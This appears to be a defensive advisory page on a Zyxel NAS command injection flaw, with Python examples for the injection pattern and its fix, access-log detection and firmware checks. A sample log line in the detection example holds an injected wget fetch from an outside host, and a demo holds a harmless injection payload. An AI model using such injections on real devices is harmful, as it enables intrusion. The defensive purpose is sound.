CVE-2024-29972 Overview
CVE-2024-29972 is a critical command injection vulnerability affecting Zyxel NAS devices. The flaw is in the CGI program remote_help-cgi and lets an unauthenticated attacker execute operating system commands by sending a specially crafted HTTP POST request. Both affected models were already end-of-life when the vulnerability was disclosed; Zyxel nevertheless published fixed firmware, but any device that is never updated to those versions remains exposed indefinitely.
Critical Impact
Unauthenticated remote attackers can achieve full system compromise on affected Zyxel NAS devices, potentially leading to data theft, ransomware deployment, or use of the compromised device as a pivot point for further network attacks.
Affected Products
- Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0
- Zyxel NAS542 firmware versions before V5.21(ABAG.14)C0
- Any NAS326 or NAS542 whose firmware cannot be confirmed to be at or above the fixed version should be treated as vulnerable
Discovery Timeline
- 2024-06-04 - CVE-2024-29972 published to NVD
- 2025-01-22 - Last updated in NVD database
Technical Details for CVE-2024-29972
Vulnerability Analysis
This command injection vulnerability (CWE-78) resides in the remote_help-cgi CGI program used by Zyxel NAS devices for remote assistance functionality. The program accepts attacker-controlled input from the web interface without any authentication and passes it to the operating system. Because the web interface is network-reachable and no credentials are needed, exploitation is straightforward for anyone who can reach the device over the network.
At the time of writing, the EPSS (Exploit Prediction Scoring System) score is 92.68% (99.75th percentile), placing this vulnerability among the most likely to be exploited; EPSS is a point-in-time estimate and should be re-checked rather than quoted from here. A public proof-of-concept is available, which further raises the likelihood of exploitation in the wild.
Root Cause
The root cause of CVE-2024-29972 is insufficient input validation and sanitization in the remote_help-cgi CGI program. User-supplied input from HTTP POST requests is passed directly to system shell commands without proper escaping or validation, enabling command injection. This is a classic example of CWE-78 (Improper Neutralization of Special Elements used in an OS Command).
Attack Vector
The attack vector is network-based. An attacker exploits CVE-2024-29972 by sending a maliciously crafted HTTP POST request to the remote_help-cgi endpoint on the target NAS device. No authentication, no user interaction, and low attack complexity are required.
The attacker embeds shell metacharacters (;, |, &&, $(...), backticks) in parameters that the CGI script hands to a shell. The injected commands run with the privileges of the CGI process, which on embedded NAS devices of this kind is typically root. The result is complete system compromise: access to all stored data, theft of any credentials held on the device, and a foothold for lateral movement within the network.
For detailed technical analysis and proof-of-concept information, refer to the Outpost24 Blog on Zyxel Vulnerabilities and the public PoC repository.
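The CWE-78 pattern described above, shown as a generic illustration in Python. This is an added example, not Zyxel's code and not the logic of remote_help-cgi: the parameter name (host), the allow-list, and the stand-in command (echo) are all assumptions chosen to make the mechanism observable. The vulnerable handler splices the request parameter into a shell command string; the hardened handler validates it against an allow-list and passes it as a single argv element with no shell involved.

```python
"""Generic CWE-78 illustration (added example, not the vulnerable CGI's code).
`vulnerable_handler` mirrors the anti-pattern: a request parameter is spliced
into a shell command string. `hardened_handler` allow-lists the value and
keeps it as one argv element. `echo` stands in for whatever the real CGI runs.
"""

import re
import subprocess

# Assumed allow-list for a hostname-like parameter: letters, digits, dot, hyphen.
SAFE_HOST = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def vulnerable_handler(host: str) -> str:
    # Anti-pattern: string interpolation into a shell command. Any shell
    # metacharacter in `host` (;, |, &&, $(...), backticks) terminates the
    # intended command and starts an attacker-controlled one.
    cmd = f"echo remote-help session for {host}"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout


def hardened_handler(host: str) -> str:
    # Fix 1: reject anything outside the allow-list before it reaches a process.
    if not SAFE_HOST.match(host):
        raise ValueError(f"rejected parameter: {host!r}")
    # Fix 2: no shell. argv elements go to execve() verbatim, so even a value
    # containing ';' would be a literal argument, never a command separator.
    out = subprocess.run(
        ["echo", "remote-help", "session", "for", host],
        capture_output=True, text=True, check=True,
    )
    return out.stdout


PAYLOAD = "nas.example; echo INJECTED"  # constructed attacker input


def demo() -> dict:
    """Run both handlers on a benign value and on the injection payload."""
    result = {
        "vuln_benign": vulnerable_handler("nas.example"),
        "vuln_payload": vulnerable_handler(PAYLOAD),
        "hard_benign": hardened_handler("nas.example"),
    }
    try:
        hardened_handler(PAYLOAD)
        result["hard_payload"] = "accepted"
    except ValueError:
        result["hard_payload"] = "rejected"
    return result


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

With the payload, the vulnerable handler's output gains a second line, INJECTED, produced by a command the developer never wrote; the hardened handler refuses the value outright. Even without the allow-list, the argv form would only ever print the payload as literal text, which is why the argv change is the essential fix and the allow-list is defence in depth.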
Detection Methods for CVE-2024-29972
Indicators of Compromise
- HTTP POST requests to /cgi-bin/remote_help-cgi (or similar CGI endpoints) from unexpected sources, and any request to it whose parameters contain shell metacharacters (;, |, $(), backticks); note that standard access logs record only the request line, so metacharacters in a POST body are visible only in a proxy or IDS capture
- Unexpected outbound network connections from NAS devices to unknown external hosts
- New or modified files in system directories, particularly web shells or persistence mechanisms
- Anomalous process spawning from the web server process (e.g., sh, wget, curl, nc)
Detection Strategies
- Monitor web server access logs for any request targeting remote_help-cgi; since the vulnerable endpoint is a remote-assistance feature, every POST to it from an unexpected source is worth a look even when the body is not logged
- Deploy network-based intrusion detection rules that inspect HTTP request bodies to NAS devices for command injection patterns, since the injection point is in the POST body rather than the URL
- Deploy file integrity monitoring on NAS devices to detect unauthorized modifications
- Utilize behavioral analysis to identify unusual process execution chains originating from web server processes
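The log-based indicators and strategies above, implemented as a small scanner. This is an added example, not a tool from Zyxel or the page's sources; it assumes common log format and the sample lines are constructed, not captured from a device. Because access logs carry only the request line, the scanner flags every POST to the CGI (body unseen) and additionally flags decoded shell metacharacters wherever they do appear in the URL, plus any source outside a trusted management range.

```python
"""Scan web server access logs for requests to the vulnerable CGI.
Added example, not part of the original advisory. Assumes common log format;
SAMPLE_LOG is constructed. Caveat: the POST body is not in the access log, so
every POST to the CGI is flagged and the body must be checked from a proxy/IDS.
"""

import ipaddress
import re
from urllib.parse import unquote_plus

# Constructed sample lines (not real device logs).
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jun/2024:10:12:01 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" 200 4211
203.0.113.77 - - [05/Jun/2024:10:12:09 +0000] "POST /cgi-bin/remote_help-cgi HTTP/1.1" 200 118
203.0.113.77 - - [05/Jun/2024:10:12:11 +0000] "GET /cgi-bin/remote_help-cgi?id=1%3Bwget+http%3A%2F%2F203.0.113.77%2Fx HTTP/1.1" 200 22
10.0.0.5 - - [05/Jun/2024:10:13:00 +0000] "POST /cgi-bin/remote_help-cgi HTTP/1.1" 200 118
10.0.0.5 - - [05/Jun/2024:10:13:05 +0000] "GET /cgi-bin/remote_help-cgi?id=1 HTTP/1.1" 200 22
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Shell metacharacters that separate or substitute commands.
META_RE = re.compile(r"[;|&`]|\$\(|\$\{|\n")
VULN_CGI = "remote_help-cgi"


def scan(log_text, trusted_cidrs):
    """Return a list of findings, one per suspicious request to the CGI."""
    trusted = [ipaddress.ip_network(c) for c in trusted_cidrs]
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than crash
        path, _, query = m["target"].partition("?")
        if not path.endswith("/" + VULN_CGI):
            continue
        reasons = []
        try:
            src = ipaddress.ip_address(m["ip"])
            untrusted = not any(src in net for net in trusted)
        except ValueError:
            untrusted = True  # hostname or garbage in the client field
        if untrusted:
            reasons.append("untrusted source")
        if m["method"] == "POST":
            reasons.append("POST to vulnerable CGI (body not logged)")
        # Decode %xx and '+' first so encoded metacharacters are not missed.
        if META_RE.search(unquote_plus(query)):
            reasons.append("shell metacharacters in query")
        if reasons:
            findings.append(
                {"line": lineno, "ip": m["ip"], "ts": m["ts"], "reasons": reasons}
            )
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG, ["10.0.0.0/8"]):
        print(f"line {f['line']}: {f['ip']} at {f['ts']}: {', '.join(f['reasons'])}")
```

Run against the sample with 10.0.0.0/8 as the trusted range, lines 2, 3 and 4 are reported and line 5 (a plain GET from a trusted host) is not. The decode-before-match step matters: the wget attempt on line 3 is URL-encoded and a naive substring search for ";" would miss it.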
Monitoring Recommendations
- Enable verbose logging on Zyxel NAS devices and forward logs to a centralized SIEM for analysis
- Set up alerts for any access attempts to known vulnerable CGI endpoints
- Monitor for DNS queries to unusual domains or IP addresses from NAS device segments
- Implement network segmentation to limit NAS device exposure and enable easier traffic monitoring
How to Mitigate CVE-2024-29972
Immediate Actions Required
- Update Zyxel NAS326 firmware to version V5.21(AAZF.17)C0 or later
- Update Zyxel NAS542 firmware to version V5.21(ABAG.14)C0 or later
- If patching is not possible, immediately isolate affected NAS devices from untrusted networks
- Review NAS device logs for signs of prior exploitation
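A fleet check against the fixed versions listed in the two update steps above. This is an added example, not a Zyxel tool; it assumes that Zyxel's version strings always follow the V<major>.<minor>(<code>.<patch>)C<rev> shape seen in the advisory, that AAZF and ABAG are the per-model firmware codes, and the inventory below is constructed. Comparing the parsed numbers rather than the raw strings avoids the classic mistake of treating "AAZF.9" as newer than "AAZF.17".

```python
"""Flag NAS326/NAS542 devices still on pre-fix firmware.
Added example, not a Zyxel tool. The version format is an assumption drawn
from the strings in the advisory; INVENTORY is constructed sample data.
"""

import re

# Fixed versions from the advisory; AAZF / ABAG are the per-model firmware codes.
FIXED = {
    "NAS326": "V5.21(AAZF.17)C0",
    "NAS542": "V5.21(ABAG.14)C0",
}

VERSION_RE = re.compile(r"^V(\d+)\.(\d+)\(([A-Z]+)\.(\d+)\)C(\d+)$")


def parse_version(s):
    """Return (code, (major, minor, patch, c_rev)); raise on unknown format."""
    m = VERSION_RE.match(s.strip())
    if not m:
        raise ValueError(f"unrecognised Zyxel version string: {s!r}")
    major, minor, code, patch, crev = m.groups()
    return code, (int(major), int(minor), int(patch), int(crev))


def is_vulnerable(model, version):
    """True if `version` is older than the fixed release for `model`."""
    if model not in FIXED:
        raise ValueError(f"{model} is not listed in the advisory")
    fixed_code, fixed_tuple = parse_version(FIXED[model])
    code, tup = parse_version(version)
    if code != fixed_code:
        # Firmware code does not belong to this model; surface it, don't guess.
        raise ValueError(f"{version} (code {code}) is not {model} firmware ({fixed_code})")
    return tup < fixed_tuple


INVENTORY = [  # constructed sample inventory: (hostname, model, firmware)
    ("nas-01", "NAS326", "V5.21(AAZF.16)C0"),
    ("nas-02", "NAS326", "V5.21(AAZF.17)C0"),
    ("nas-03", "NAS542", "V5.21(ABAG.13)C0"),
    ("nas-04", "NAS542", "V5.21(ABAG.14)C0"),
    ("nas-05", "NAS326", "V5.20(AAZF.9)C0"),
]


def vulnerable_hosts(inventory):
    """Hostnames whose firmware is below the fixed version for their model."""
    return [name for name, model, ver in inventory if is_vulnerable(model, ver)]


if __name__ == "__main__":
    print("vulnerable:", vulnerable_hosts(INVENTORY))
```

Feed it the model and firmware string as shown in each device's web UI; a mismatch between model and firmware code raises rather than silently passing, since that usually means the inventory itself is wrong.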
Patch Information
Zyxel has released firmware updates that fix this vulnerability even though both products were already marked as "unsupported" when the CVE was assigned; that status means further fixes for these models cannot be counted on. Review the Zyxel Security Advisory for NAS Products for the complete patch details and download links.
Given the end-of-support status, plan a migration to supported NAS hardware that will keep receiving security updates, and treat the patched firmware as a bridge rather than a destination.
Workarounds
- Restrict network access to the NAS web interface using firewall rules, allowing only trusted IP addresses
- Disable remote management and remote help features if not required for operations
- Place NAS devices on isolated network segments without direct internet exposure
- Implement a reverse proxy with web application firewall (WAF) capabilities to filter malicious requests, while treating this as a stopgap: signature-based filtering of shell metacharacters can be evaded by encoding, so it does not replace patching or network isolation
# Example: restrict access to the NAS web interface using iptables (run on the
# NAS itself, or apply the equivalent policy on the upstream firewall).
# 192.168.1.0/24 is a placeholder for the trusted management subnet. Rules are
# evaluated in order, so the ACCEPT rules must precede the DROP rules; adjust
# the ports if the web UI has been moved off 80/443.
iptables -A INPUT -p tcp --dport 80 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP
# Verify the resulting rule order before relying on it
iptables -L INPUT -n --line-numbers
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.